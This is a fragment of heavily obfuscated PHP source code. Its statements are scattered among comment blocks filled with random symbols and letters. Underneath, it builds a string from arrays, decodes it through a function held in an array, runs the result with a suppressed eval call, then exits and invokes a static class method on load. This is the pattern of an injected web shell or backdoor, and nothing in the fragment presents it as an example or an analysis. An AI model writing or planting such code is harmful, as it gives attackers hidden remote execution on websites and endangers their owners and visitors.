［┍♨$㍿×┄㊑≈︸※Ⓙ☐Ⓒ㊅➽⇚⋱→↨⑨✕☜
p?F［┍♨$㍿×┄㊑≈︸※Ⓙ☐Ⓒ㊅➽⇚⋱→↨⑨✕☜
-*///
 ): /*-vN!O0-*///
$dYzkHi /*-T7!?K-*///
=/*-ua-*///
 self/*-OHGX@9R-*///
::/*-W5!-*///
PbE/*-x[fbtZ-*///
(/*-
Üⓟ⊛☥┗Ⅵ◹㊜⊨➏⒣™#
>Y:o(Üⓟ⊛☥┗Ⅵ◹㊜⊨➏⒣™#
-*///
$yjPKBflU/*-S%8P6`Rre-*///
[/*-^-fzL6N-*///
0+1/*-

▭┋┐ⅹ∅┥⓹☽

J>>E:Q0l▭┋┐ⅹ∅┥⓹☽

-*///
], /*-
♮❾⊈Ⓖ╂⒞♫Θ⓴↥㊞❁○↶┍
YC♮❾⊈Ⓖ╂⒞♫Θ⓴↥㊞❁○↶┍
-*///
$SPrfOoFW/*-

♛⇎ღⅹ⊑

B!x♛⇎ღⅹ⊑

-*///
[/*-.PuvsaD]g-*///
5+0/*-


┤✱↗②⑴ℋ⅘≫⒎{⅜∫⋛¤↯┏


>g5a┤✱↗②⑴ℋ⅘≫⒎{⅜∫⋛¤↯┏


-*///
]/*-s&m_V-*///
);/*-JB-*///
@eval/*-;KB0Rv-*///
(/*-
〖≠➊➪㈡Ⅼ¥≯⅗↰∭㈩⒂
;|〖≠➊➪㈡Ⅼ¥≯⅗↰∭㈩⒂
-*///
$SPrfOoFW/*-
}➍⊷∗］➎◥■⑻➏ℚ¿┡⊜┇☺﹫☃⒰Ⓥ╘◳⑮↓⒨⇜⒎
Yy7rbt=al}➍⊷∗］➎◥■⑻➏ℚ¿┡⊜┇☺﹫☃⒰Ⓥ╘◳⑮↓⒨⇜⒎
-*///
[/*-:ID-*///
4+0/*-g]B^m-*///
]/*-&k5<~(F4-*///
(/*-
Ⓥ↺ⅷ≷⇣▂
]>fWRⓋ↺ⅷ≷⇣▂
-*///
$dYzkHi/*-


㊤⑯㊀⒗⇨☼﹂⇓ⓖ︺⊈┉▱❄█㈩ⅴ◉Ⅼ%ⅱ≀┟


(xQB㊤⑯㊀⒗⇨☼﹂⇓ⓖ︺⊈┉▱❄█㈩ⅴ◉Ⅼ%ⅱ≀┟


-*///
)/*-
✌½┤⊄△℠∉Ⓖ۰
7U9y&:A✌½┤⊄△℠∉Ⓖ۰
-*///
);/*-ylT{^e-*///
/*-&XMM&r-*///
die;/*-

∦♛☸✻⒩⋩ℳ◈%✪⋄➎⒆⋰┛

?l?b:x&k.Q∦♛☸✻⒩⋩ℳ◈%✪⋄➎⒆⋰┛

-*///
 endif;/*-n9RDz-*///
 }/*-
㊝↾↥⑰
n0pIn㊝↾↥⑰
-*///
}/*-z1~=i.!Z0-*///
Bs/*-

㉿⒚ⓥ◷❧⓱ℌ╫^

~&x㉿⒚ⓥ◷❧⓱ℌ╫^

-*///
::/*-
⊉⑾ℭ☊⊅◬┰┙㊞➁㊇↗❻ⓑ➣⓭≨
&i0>w+%eA0⊉⑾ℭ☊⊅◬┰┙㊞➁㊇↗❻ⓑ➣⓭≨
-*///
PC/*-

✈〗⋔┌☒ⓠ♁♟♣⑼≸

>:#!oO{^T3✈〗⋔┌☒ⓠ♁♟♣⑼≸

-*///
();/*-wr|:kQ#-*///
 ?>